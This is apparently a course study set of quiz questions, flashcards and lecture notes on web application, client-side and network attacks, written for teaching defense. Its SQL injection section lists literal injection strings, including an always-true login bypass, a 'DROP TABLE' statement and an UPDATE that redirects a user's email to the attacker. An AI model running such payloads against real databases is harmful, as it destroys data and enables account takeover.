Untitled

Questions and Answers

Why is securing server-side web applications often considered more difficult than protecting other systems?

• Server-side applications are rarely updated, leaving them vulnerable to known exploits.
• Server-side applications are inherently more complex and have a larger attack surface.
• Traditional network security devices cannot always block web application attacks. (correct)
• Client-side vulnerabilities are easier to exploit than server-side vulnerabilities.

What is a zero-day attack?

• An attack that occurs on the zero hour of a specific day.
• An attack that exploits vulnerabilities that have been known for zero days.
• An attack that exploits previously unknown vulnerabilities. (correct)
• An attack that requires zero privileges to execute.

In a networked computer system, where can application attacks be directed?

• At the server, the client, or both. (correct)
• Only at the client.
• Only at networking devices.
• Only at the server.

Which of the following is a key characteristic that distinguishes web application attacks from traditional network attacks?

Web based attacks often exploit vulnerabilities in the application layer. (A)

Which of the following best describes the primary difference between a web application attack and a client-side attack?

Web application attacks target server-side vulnerabilities, while client-side attacks exploit vulnerabilities in client applications. (A)

An attacker embeds a zero-pixel Iframe into a compromised website. What is the primary purpose of this technique?

To avoid visual detection of malicious content. (B)

How does an attacker typically gain access to a web server's operating system in a drive-by download attack?

By exploiting vulnerabilities in the web server software. (B)

Which security vulnerability is exploited when an attacker injects malicious XML tags and data into a web application's database?

XML Injection. (B)

What is the primary goal of an XPath injection attack?

To manipulate XML Path Language queries. (A)

Which of the following HTTP headers is most likely to be manipulated in a client-side attack to potentially mislead a web server?

Referrer. (C)

What is the main characteristic of client-side attacks?

They exploit vulnerabilities in client applications that interact with a compromised server. (A)

How does header manipulation facilitate client-side attacks?

By allowing attackers to modify HTTP headers, potentially altering the behavior or interpretation of requests and responses. (C)

What is the primary function of add-ons or extensions in web browsers?

To add functionality and features to the web browser. (A)

How can attackers exploit ActiveX to perform malicious attacks?

By taking advantage of vulnerabilities in ActiveX controls. (A)

Why do attackers prioritize targeting networks?

Because exploiting one vulnerability can expose many devices. (C)

Which of the following is the main objective of a Denial of Service (DoS) attack?

To prevent legitimate users from accessing a system or resource. (B)

What makes Distributed Denial of Service (DDoS) attacks more potent than traditional DoS attacks?

DDoS attacks originate from multiple compromised computers. (B)

What occurs during a ping flood attack, and what is its impact on the targeted server?

The server is flooded with ICMP echo request messages, leading to dropped legitimate connections. (D)

Which of the following actions can malicious add-ons perform on a web browser?

Create additional browser toolbars. (C)

Which of the following is NOT a type of networking-based attack?

Phishing. (C)

Which HTTP header field, when manipulated, allows an attacker to potentially inject SQL commands into a database?

Accept-Language (A)

What type of cookie is stored in a computer's RAM and is automatically deleted when the web browser is closed?

Session cookie (C)

A website sets a cookie that remains on a user’s hard drive even after the browser is closed. What type of cookie is this?

Persistent cookie (C)

Which of the following best describes the primary risk associated with first-party cookies?

They can be stolen and used to impersonate the user on the originating website. (D)

Besides regular cookies, what other client-side storage mechanism can websites use to store data, with a larger storage capacity?

Locally Shared Object (LSO) (B)

What is a session token used for in web applications, and how do attackers typically try to obtain it?

To maintain state between the user and the web application; by stealing or guessing the token. (B)

An attacker modifies the 'Referer' field in an HTTP request. What is the most likely reason for doing so?

To bypass security measures that rely on checking the origin of the request. (D)

Which attack involves an attacker attempting to impersonate a legitimate user by stealing or guessing the user’s session token?

Session Hijacking (B)

In a Smurf attack, what is the primary technique used to direct responses towards the victim?

Spoofing the source address in ping requests to appear as if the victim is asking for responses. (D)

How does a SYN flood attack exploit the process of initiating a session between a client and a server?

By flooding the server with SYN packets from nonexistent or unreachable addresses, preventing legitimate connections. (C)

What is the key difference between a passive and an active Man-in-the-Middle attack?

Passive attacks only capture and record data, while active attacks alter the contents of the transmission. (B)

In the context of replay attacks, what is the attacker's primary goal when capturing and retransmitting network communications?

To impersonate a legitimate user or device and gain unauthorized access or establish a false trust relationship. (C)

What are the two main criteria that a website must meet to be vulnerable to an XSS attack?

It accepts user input without validating it and uses that input in a response. (C)

In the context of SQL injection, what is the primary goal of an attacker when exploiting a 'forgotten password' feature?

To gain information about whether input is being validated by the application. (B)

Which type of DoS attack involves an attacker overwhelming a victim's system by exploiting the transmission of Internet Control Message Protocol (ICMP) echo requests?

Smurf attack (C)

Why is proper input validation crucial in preventing server-side web application attacks?

It mitigates the risk of attackers injecting malicious code or commands through user-supplied data. (D)

What is the most significant risk associated with a successful replay attack that captures logon credentials?

Unauthorized access to user accounts and sensitive data. (A)

What is the key difference between HTML and XML in the context of web development and data handling?

HTML uses predefined tags to instruct browsers on how to display text, while XML carries data with user-defined tags. (A)

Which of the following attack types primarily aims to deceive network devices into sending responses to an unintended target?

Smurf attack. (D)

In what scenario would a replay attack be most effective in establishing a trust relationship between an attacker and a server?

When the attacker captures a valid authentication message from a trusted device and replays it later. (B)

An attacker injects the following SQL code into an email field: ' OR 'a'='a. What is the likely outcome of this injection?

The database will display all user email addresses due to the always true condition. (C)

A web application accepts XML data to process user profiles. An attacker injects malicious XML code. What type of server-side attack is this?

XML Injection (B)

How can developers mitigate the risk of SQL injection vulnerabilities in web applications?

By using parameterized queries or stored procedures to handle user input. (C)

When a victim visits a website that has been injected with malicious JavaScript through an XSS attack, what is the immediate risk?

Malicious instructions are sent to the victim's browser, potentially stealing information. (C)

Flashcards

Server-Side Web Application Attacks

Attacks targeting user inputs to web applications.

Cross-Site Scripting (XSS)

Injecting malicious scripts into websites to target clients.

XSS Attack Requirements

Requires a website to accept unvalidated user input and use it in a response.

SQL Injection

Targets SQL servers by injecting malicious commands.

SQL (Structured Query Language)

Structured Query Language, used to manipulate data in databases.

SQL Injection Example

Entering SQL statements into a field, causing unintended data retrieval or manipulation.

XML Definition

A markup language for adding annotations to text.

XML Purpose

Carries data instead of indicating how to display it, using user-defined tags.

Application Attacks

Attacks targeting applications within a networked computer system, directed at the server, client, or both.

Network Security Device Limitations

Security tools effective against traditional network threats often fail against application-level attacks.

HTTP Traffic Inspection

Many security devices do not analyze the data transmitted via HTTP.

Zero-Day Attack

An attack that exploits previously unknown vulnerabilities.

Client-Side Attacks

Attacks that occur within the applications on the client side of a computer.

Networking-Based Attacks

Attacks designed to exploit weakness in computer network protocols and infrastructure.

Overflow Attacks

Attack which attempts to write data beyond allocated buffer boundaries.

Plug-in

Third-party libraries that attach to a web browser, potentially embedded in webpages.

Add-ons or Extensions

They add extra functions to a web browser, like new toolbars or menu options.

Malicious Add-ons

Attackers create these malicious add-ons to harm a user's computer.

ActiveX

A Microsoft standard for applications to share info, can be exploited for attacks.

Denial of Service (DoS)

An attempt to prevent authorized users from accessing a system, often by overwhelming it with requests.

Distributed Denial of Service (DDoS)

A DoS attack using a botnet to flood a target with requests.

Ping flood attack

Overwhelming a server with ICMP echo requests, causing it to drop legitimate connections.

Referer Field

Indicates the website that generated the current webpage.

XML Injection Attack

An attack where an attacker injects XML tags and data into a database through a website that doesn't filter user data.

Response Splitting

An attack that manipulates HTTP headers to inject malicious code or redirect users.

XPath Injection

A specific XML injection attack that exploits XML Path Language queries built from user input.

Cookies

Small text files stored on a user's computer that contain user-specific information.

Client-Side Application Attacks

Attacks targeting vulnerabilities in client applications that interact with a compromised server or process malicious data.

Drive-by Download

When a client computer is compromised just by viewing a web page.

First-Party Cookie

Created by the website the user is currently viewing.

Compromised Web Server (Drive-by Download)

Injects malicious content into a vulnerable web server to gain access to the server's OS.

Third-Party Cookie

Cookies placed by advertisers to record user preferences across different sites.

Session Cookie

A cookie stored in RAM that expires when the browser is closed.

Zero Pixel Iframe

A hidden HTML element used in drive-by downloads to avoid visual detection.

Header Manipulation

Modifying HTTP headers, which contain fields characterizing transmitted data, to conduct an attack.

Persistent Cookie

A cookie recorded on the computer's hard drive that does not expire when the browser closes.

HTTP Header Manipulation Examples

HTTP header fields (Referrer, Accept-Language) are changed to perform malicious tasks.

Session Hijacking

An attack where an attacker steals or guesses a user's session token to impersonate them.

Smurf Attack

A type of DoS attack where an attacker tricks devices into overwhelming a victim with responses to spoofed requests.

Smurf Attack Mechanism

An attacker broadcasts a ping request to all computers on a network, spoofing the victim's address, causing a flood of responses to overwhelm the victim's computer.

SYN Flood Attack

A type of DoS attack that exploits the TCP handshake process by sending many SYN packets to a server, often with spoofed source addresses, to exhaust the server's resources.

SYN Flood Attack Process

The attacker sends SYN segments in IP packets to the server, modifying the source address of each packet to computer addresses that do not exist or cannot be reached

Interception Attacks

Attacks designed to secretly listen to or capture network communications.

Man-in-the-Middle Attack

An attacker intercepts legitimate communication, posing as each party to the other, possibly altering data in transit.

Replay Attack

Attack that captures and delays a transmission before retransmitting it to the original recipient.

Replay Attack - Trust Exploitation

An attacker captures a valid network message and resends it later to gain unauthorized access or establish a false trust relationship.

Study Notes

• The session discusses application and networking-based attacks in cyber security.
• Instructor will spend 2 - 2.30 hours for the slides, leaving 1.30 - 2.00 hours including submission for lab work.

Application Attacks

• Attacks on networked computer system applications can target the server, client, or both

Server-Side Web Application Attacks

• Securing server-side web applications is often more difficult than securing other systems
• Traditional network security devices cannot always block web application attacks.
  • Many network security devices ignore the HTTP traffic content.
• Zero-day attack exploits previously unknown vulnerabilities.
  • Victims have little time to prepare for or defend against it.
• Many attacks target input that applications accept from users.
• Common web application attacks are:
  • Cross-site scripting
  • SQL injection
  • XML injection.

Cross-Site Scripting (XSS)

• XSS involves injecting scripts into a Web application server to target clients.
• When a victim visits an injected website
  • Malicious instructions are sent to their browser.
• Some XSS attacks are designed to steal information retained by the browser.
• An XSS attack requires that a website:
  • Accepts user input without validation.
  • Uses this input in a response.

Types of Cross-Site Scripting (XSS)

• Reflected (Non-persistent)
  • Script is executed on the victim side.
  • Script is not stored on the server.
• Stored XSS (Persistent)
  • Script is stored and executed on the server.
  • Executed every time the malicious site is requested
• DOM (Document Object Model) XSS
  • Client side attack, the script is not sent to the server.
  • Legitimate server script is executed, followed by a malicious script

SQL Injection

• SQL injection targets SQL servers by injecting malicious commands.
• SQL (Structured Query Language) is used to manipulate data in relational databases.
• Example: Attacker enters incorrectly formatted email address in a “forgotten password” field.
  • The response from the website lets the attacker know whether the input is being validated.
• Attackers enter statements, which are then processed by the database.
  • SELECT fieldlist FROM table WHERE field = 'whatever' or 'a'='a'
  • This will display all user email addresses

SQL Injection Statement Examples

• whatever' AND email IS NULL; -- Result = Determine names of different fields.
• whatever' AND 1=(SELECT COUNT(*) FROM tabname); -- Result = Discover the table name.
• whatever' OR full_name LIKE '%Mia% Result = Find specific users.
• whatever'; DROP TABLE members; -- Result = Erase the database table.
• whatever'; UPDATE members SET email = '[email protected]' WHERE email = '[email protected]'; Result = Mail password to attacker's email account.

XML Injection

• XML injection attacks are similar to SQL injection attacks
• The attacker discovers a Web site that does not filter user data and injects XML tags and data into the database.
• XPath injection is a specific type of XML injection attack that exploits XML Path Language queries built from user input.

Client Side Attacks

• Web application attacks are server-side attacks.
• Client-side attacks target vulnerabilities in client applications
• Client applications interact with a compromised server and/or process malicious data.
• The client initiates a connection with the server:
  • Which could result in an attack

Drive-by download

• Client computer is compromised simply by viewing a Web page
• Attackers inject content into vulnerable web servers.
  • gaining access to the server's operating system.
• Attackers craft zero-pixel iFrames (inline frames) to avoid visual detection.
• Code is embedded within the HTML main document.
• The client's browser downloads malicious script and computer downloads malware

HTTP Header manipulation

• HTTP header contains fields that characterize data being transmitted.
• Headers can originate from a Web browser.
  • Browsers do not normally allow this.
  • An attacker's short program can allow modification

HTTP Header Manipulation Examples

• Referer field: can be modified by the attacker to hide the fact it came from another side.
• Accept-language field: Attacker could inject a SQL command to modify this header.
• Response splitting: one of the most common header manipulation attacks

Cookies

• Cookies store user-specific information on the user's local computer.
• First-party cookie: created by the website the user is viewing
• Third-party cookie: site advertisers place a cookie to record user preferences
• Session cookie: stored in RAM and expires when the browser is closed.
• Persistent cookie: recorded on the computer's hard drive and does not expire when the browser closes, also called tracking cookies.
• Locally Shared Object (LSO): can store up to 100 KB of data, more complex than cookies, also called Flash cookies.
• Security & privacy risks
  • First-party cookies may be stolen and used to impersonate the user.
  • Used to tailor advertising and can be exploited by attackers

Attachments

• Files are coupled with email messages.
• Malicious attachments are commonly used to spread viruses, Trojans, and other malware.

Session Hijacking

• An attacker attempts to impersonate a user by stealing/guessing the session token
• A session token is a random string assigned to an interaction between a user and a web application
• Attacker can attempt to obtain the session token by:
  • By using XSS or other attacks
  • Eavesdropping on the transmission
  • Guessing the session token

Malicious Add-ons

A plugin is a third party library that attaches to the web browser, and is embedded in a webpage.

• Add-ons/extensions add functionality to the web browser.
• Add-ons can:
  • Create web browser toolbars.
  • Change browser menus.
  • Be aware of other tabs open in the same browser.
  • Process loaded web page content.

Add-On Security Risks

• Attackers create malicious add-ons targeting a user's computer.
• Malicious add-ons can be written in Microsoft's ActiveX.
  • ActiveX is a rules set for how applications under the Microsoft Windows OS should share info.
• Vulnerabilities in ActiveX can be exploited by attacker, to perform malicious attacks on a computer

Networking-Based Attacks

• Attackers place a high priority on targeting networks.
  • Exploiting a single vulnerability may expose hundreds/thousands of devices to an attacker.
• Types of networking-based attacks:
  • Denial of Service (DoS)
  • Interception
  • Poisoning
  • Attacks on access rights

Denial of Service (DoS)

• DoS: A deliberate attempt to overwhelm a system, preventing authorized users from accessing it.
• Most DoS attacks today are Distributed Denial of Service (DDoS).
  • Using hundreds/thousands of zombie computers in a botnet to flood a device with requests.

Ping Flood Attack

• Uses the 'ping' utility to send a large number of ICMP echo request messages.
• In a ping flood attack, multiple computers rapidly send a large number of ICMP echo requests.
  • The server drops legitimate connections and refuses new connections.

Smurf Attack

• Tricks devices into responding to false requests to an unsuspecting victim.
• Attacker broadcasts a ping request to all computers.
  • Address of the request is changed (called spoofing).
• It appears as if the victim's computer is asking for a response from all network computers.
• All computers send a response to the victim's computer causing it to be overwhelmed and crash, thus becoming unavailable to legitimate users.

SYN Flood Attack

• Takes advantage of procedures for initiating a session.
• In a SYN flood attack against a web server:
  • An attacker sends SYN segments in IP packets.
  • Attacker modifies the source address to unreachable computer addresses.

Interception

• Interception attacks are designed to intercept network communications.
• Man-in-the-Middle. Involves:
  • Interception of legitimate communication
  • Forging a fictitious response to the sender.
  • Two computers are sending and receiving data
  • A computer sits between them.
• Two types of attacks exist:
  • Passive - data is captured and recorded before sending onward to the original recipient.
  • Active - contents of the transmission are altered before they reach the recipient.

Replay attack

• Attacker copies a transmission before sending it to the original recipient and can:
  • Use copy at a later time
  • Example of capturing logon credentials
• More sophisticated replay attacks:
  • Attacker captures a network device's message to a server.
  • The attacker later sends the original, valid message to the server.
  • Establishing a trust relationship between the attacker and the sever

Poisoning

• Introducing a substance to harm a system.
• Attacks inject "poison" into a normal network process to facilitate an attack.
  • ARP poisoning
  • DNS poisoning

ARP Poisoning

• The attacker modifies the MAC address in the ARP cache to redirect to a different computer
• Attacks from ARP Poisoning:
  • Steal data by substituting her MAC address and steal data intended for another device.
  • Prevent Internet access by substituting an invalid MAC address for the network gateway.
  • Man-in-the-middle the device is set receive all communications by substituting her MAC address
  • DoS attack the valid IP address is substituted for an invalid MAC address.

DNS Poisoning

• The current basis for name resolution to IP address is the Domain Name System.
• DNS poisoning substitutes DNS addresses to redirect a computer to another device.
• Two locations for DNS poisoning:
  • Local host table
  • External DNS server

Session 3 Summary

• Web application flaws are exploited through normal communication channels.
  • Makes web apps more difficult to protect.
• Cross-site scripting (XSS) uses web sites that accept user input without validating it:
  • The uses the server to launch attacks on computers that access it.
• Client side attacks target vulnerabilities in client applications.
  • A client interacts with a compromised server.
• Session hijacking occurs when an attacker steals a session token and impersonates user.
• Buffer overflow attempts to compromise a computer by pushing data into inappropriate memory locations.
• DoS attempts to overwhelm a system so it cannot perform normal functions.
• In ARP and DNS poisoning valid addresses are replaced with fraudulent addresses.
• Access rights and privileges may also be exploited.